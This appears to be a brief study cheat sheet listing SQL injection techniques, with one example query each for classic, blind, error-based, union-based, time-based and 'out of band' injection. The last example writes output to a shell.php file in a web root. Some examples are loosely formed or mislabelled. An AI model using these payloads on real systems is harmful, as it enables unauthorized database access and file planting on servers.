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#SQL injection attacks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##Classic SQL injection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users WHERE username = 'admin' OR '1'='1';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##Blind Sql injection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users WHERE username = 'admin' AND substring(password, 1, 1) = 'a';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##Error based SQL injection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users WHERE username = 'admin' AND 1/0;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##union based SQL injection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users WHERE username = 'admin' UNION SELECT 1, 'password', 3 FROM users WHERE username = 'user';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##Time based blind-sql injection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users WHERE username = 'admin' AND IF(ascii(substr(database(),1,1))=97, BENCHMARK(1000000,MD5('a')),1);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##Out of band sql injection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users WHERE username = 'admin';SELECT * FROM users;SELECT * FROM users WHERE username = 'admin' INTO OUTFILE '/var/www/html/shell.php';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